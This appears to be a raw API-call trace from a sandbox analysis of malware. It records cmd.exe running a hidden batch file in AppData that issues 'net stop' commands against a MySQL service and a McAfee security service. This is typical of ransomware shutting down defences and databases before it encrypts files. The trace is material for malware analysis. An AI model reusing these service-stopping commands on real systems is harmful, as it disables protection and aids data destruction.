_vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0201.175] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0201.175] GetProcessHeap () returned 0x3e0000 [0201.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.175] GetEnvironmentStringsW () returned 0x3f8408* [0201.175] GetProcessHeap () returned 0x3e0000 [0201.175] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.175] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.175] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0201.175] GetProcessHeap () returned 0x3e0000 [0201.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.175] GetEnvironmentStringsW () returned 0x3f8408* [0201.175] GetProcessHeap () returned 0x3e0000 [0201.175] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.175] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.175] GetProcessHeap () returned 0x3e0000 [0201.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0201.176] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0201.176] _get_osfhandle (_FileHandle=1) returned 0x264 [0201.176] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0201.176] _get_osfhandle (_FileHandle=1) returned 0x264 [0201.176] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0201.176] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0201.176] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0201.176] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0201.176] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0201.176] SetConsoleInputExeNameW () returned 0x1 [0201.176] GetConsoleOutputCP () returned 0x1b5 [0201.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0201.177] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.177] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0201.177] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0201.177] _get_osfhandle (_FileHandle=3) returned 0x78 [0201.177] SetFilePointer (in: hFile=0x78, lDistanceToMove=3224, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc98 [0201.177] GetProcessHeap () returned 0x3e0000 [0201.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0201.177] GetProcessHeap () returned 0x3e0000 [0201.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0201.177] GetProcessHeap () returned 0x3e0000 [0201.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0201.177] GetProcessHeap () returned 0x3e0000 [0201.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0201.177] GetProcessHeap () returned 0x3e0000 [0201.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0201.177] GetProcessHeap () returned 0x3e0000 [0201.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0201.177] GetProcessHeap () returned 0x3e0000 [0201.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0201.177] GetProcessHeap () returned 0x3e0000 [0201.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0201.177] GetProcessHeap () returned 0x3e0000 [0201.177] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0201.177] GetProcessHeap () returned 0x3e0000 [0201.178] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0201.178] GetProcessHeap () returned 0x3e0000 [0201.178] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0201.178] GetProcessHeap () returned 0x3e0000 [0201.178] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0201.178] GetProcessHeap () returned 0x3e0000 [0201.178] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0201.178] _get_osfhandle (_FileHandle=3) returned 0x78 [0201.178] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc98 [0201.178] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xc29, lpOverlapped=0x0) returned 1 [0201.178] SetFilePointer (in: hFile=0x78, lDistanceToMove=3245, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xcad [0201.178] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=21, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MySQL57 /y\r\nviceMediaService /y\r\niceΓÇ¥ /y\r\nures\r\nnded\r\n") returned 21 [0201.178] _get_osfhandle (_FileHandle=3) returned 0x78 [0201.178] GetFileType (hFile=0x78) returned 0x1 [0201.178] _get_osfhandle (_FileHandle=3) returned 0x78 [0201.178] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xcad [0201.178] GetProcessHeap () returned 0x3e0000 [0201.178] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0201.179] GetProcessHeap () returned 0x3e0000 [0201.179] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0201.182] _tell (_FileHandle=3) returned 3245 [0201.182] _close (_FileHandle=3) returned 0 [0201.182] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0201.182] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0201.182] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0201.182] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0201.182] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0201.182] _wcsicmp (_String1="net", _String2="CD") returned 11 [0201.182] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0201.182] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0201.182] _wcsicmp (_String1="net", _String2="REN") returned -4 [0201.182] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0201.182] _wcsicmp (_String1="net", _String2="SET") returned -5 [0201.182] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0201.182] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0201.182] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0201.182] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0201.182] _wcsicmp (_String1="net", _String2="MD") returned 1 [0201.182] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0201.182] _wcsicmp (_String1="net", _String2="RD") returned -4 [0201.182] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0201.182] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0201.182] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0201.182] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0201.182] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0201.183] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0201.183] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0201.183] _wcsicmp (_String1="net", _String2="VER") returned -8 [0201.183] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0201.183] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0201.183] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0201.183] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0201.183] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0201.183] _wcsicmp (_String1="net", _String2="START") returned -5 [0201.183] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0201.183] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0201.183] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0201.183] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0201.183] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0201.183] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0201.183] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0201.183] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0201.183] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0201.183] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0201.183] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0201.183] SetErrorMode (uMode=0x0) returned 0x1 [0201.183] GetProcessHeap () returned 0x3e0000 [0201.183] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0201.184] GetProcessHeap () returned 0x3e0000 [0201.184] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0201.184] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0201.184] GetProcessHeap () returned 0x3e0000 [0201.184] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0201.184] GetProcessHeap () returned 0x3e0000 [0201.184] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0201.184] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.185] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.185] GetLastError () returned 0x2 [0201.185] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.185] GetLastError () returned 0x2 [0201.186] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.186] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0201.186] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.187] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.187] GetLastError () returned 0x2 [0201.187] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0201.187] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.187] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.188] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0201.188] SetErrorMode (uMode=0x0) returned 0x1 [0201.188] GetProcessHeap () returned 0x3e0000 [0201.188] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0201.188] GetProcessHeap () returned 0x3e0000 [0201.188] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0201.188] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0201.188] GetProcessHeap () returned 0x3e0000 [0201.189] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0201.189] GetProcessHeap () returned 0x3e0000 [0201.189] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0201.189] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.189] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.189] GetLastError () returned 0x2 [0201.190] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.190] GetLastError () returned 0x2 [0201.190] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.191] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0201.191] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0201.191] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.191] GetLastError () returned 0x2 [0201.192] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0201.192] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0201.192] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.192] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0201.192] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0201.192] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0201.193] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0201.193] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MySQL57 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MySQL57 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MySQL57 /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x594, dwThreadId=0x6b8)) returned 1 [0201.198] CloseHandle (hObject=0x78) returned 1 [0201.198] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0201.198] GetProcessHeap () returned 0x3e0000 [0201.198] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.198] GetEnvironmentStringsW () returned 0x3f8408* [0201.198] GetProcessHeap () returned 0x3e0000 [0201.199] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.199] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.199] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0201.377] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0201.377] CloseHandle (hObject=0x74) returned 1 [0201.377] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0201.377] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0201.377] GetProcessHeap () returned 0x3e0000 [0201.377] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.377] GetEnvironmentStringsW () returned 0x3f8408* [0201.378] GetProcessHeap () returned 0x3e0000 [0201.378] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.378] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.378] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0201.378] GetProcessHeap () returned 0x3e0000 [0201.378] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.378] GetEnvironmentStringsW () returned 0x3f8408* [0201.378] GetProcessHeap () returned 0x3e0000 [0201.378] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.379] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.379] GetProcessHeap () returned 0x3e0000 [0201.379] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0201.379] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0201.379] _get_osfhandle (_FileHandle=1) returned 0x264 [0201.379] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0201.379] _get_osfhandle (_FileHandle=1) returned 0x264 [0201.379] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0201.379] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0201.379] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0201.379] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0201.379] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0201.380] SetConsoleInputExeNameW () returned 0x1 [0201.380] GetConsoleOutputCP () returned 0x1b5 [0201.380] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0201.380] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0201.380] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0201.380] _get_osfhandle (_FileHandle=3) returned 0x74 [0201.380] SetFilePointer (in: hFile=0x74, lDistanceToMove=3245, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xcad [0201.380] GetProcessHeap () returned 0x3e0000 [0201.380] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0201.380] GetProcessHeap () returned 0x3e0000 [0201.380] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0201.380] GetProcessHeap () returned 0x3e0000 [0201.380] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0201.380] GetProcessHeap () returned 0x3e0000 [0201.380] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0201.380] GetProcessHeap () returned 0x3e0000 [0201.380] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0201.380] GetProcessHeap () returned 0x3e0000 [0201.380] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0201.381] GetProcessHeap () returned 0x3e0000 [0201.381] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0201.381] GetProcessHeap () returned 0x3e0000 [0201.381] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0201.381] GetProcessHeap () returned 0x3e0000 [0201.381] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0201.381] GetProcessHeap () returned 0x3e0000 [0201.381] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0201.381] GetProcessHeap () returned 0x3e0000 [0201.381] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0201.381] GetProcessHeap () returned 0x3e0000 [0201.381] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0201.381] GetProcessHeap () returned 0x3e0000 [0201.381] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0201.381] _get_osfhandle (_FileHandle=3) returned 0x74 [0201.381] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xcad [0201.381] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xc14, lpOverlapped=0x0) returned 1 [0201.382] SetFilePointer (in: hFile=0x74, lDistanceToMove=3289, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xcd9 [0201.382] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=44, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop McAfeeFrameworkMcAfeeFramework /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 44 [0201.382] _get_osfhandle (_FileHandle=3) returned 0x74 [0201.382] GetFileType (hFile=0x74) returned 0x1 [0201.382] _get_osfhandle (_FileHandle=3) returned 0x74 [0201.382] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xcd9 [0201.382] GetProcessHeap () returned 0x3e0000 [0201.382] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0201.382] GetProcessHeap () returned 0x3e0000 [0201.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0201.386] _tell (_FileHandle=3) returned 3289 [0201.386] _close (_FileHandle=3) returned 0 [0201.386] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0201.386] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0201.386] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0201.386] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0201.386] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0201.386] _wcsicmp (_String1="net", _String2="CD") returned 11 [0201.386] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0201.386] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0201.386] _wcsicmp (_String1="net", _String2="REN") returned -4 [0201.386] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0201.386] _wcsicmp (_String1="net", _String2="SET") returned -5 [0201.386] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0201.386] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0201.386] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0201.386] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0201.386] _wcsicmp (_String1="net", _String2="MD") returned 1 [0201.386] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0201.386] _wcsicmp (_String1="net", _String2="RD") returned -4 [0201.386] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0201.386] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0201.386] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0201.386] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0201.386] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0201.386] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0201.386] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0201.386] _wcsicmp (_String1="net", _String2="VER") returned -8 [0201.386] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0201.386] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0201.386] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0201.386] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0201.386] _wcsicmp (_String1="net", _String2="TITLE") returned -6 